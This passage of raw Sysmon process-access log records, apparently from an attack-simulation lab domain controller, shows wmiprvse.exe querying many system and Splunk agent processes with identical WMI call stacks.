a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030631Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.676{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030630Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.676{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030629Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.676{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030628Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.676{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030627Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.676{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030626Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.676{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030625Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.676{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030624Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.676{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030623Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.676{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030622Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.676{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030621Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.676{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030620Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.676{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030619Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.676{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030618Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.676{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030617Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.676{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030616Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.676{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030615Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.676{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030614Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.676{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030613Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.661{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030612Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.661{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Win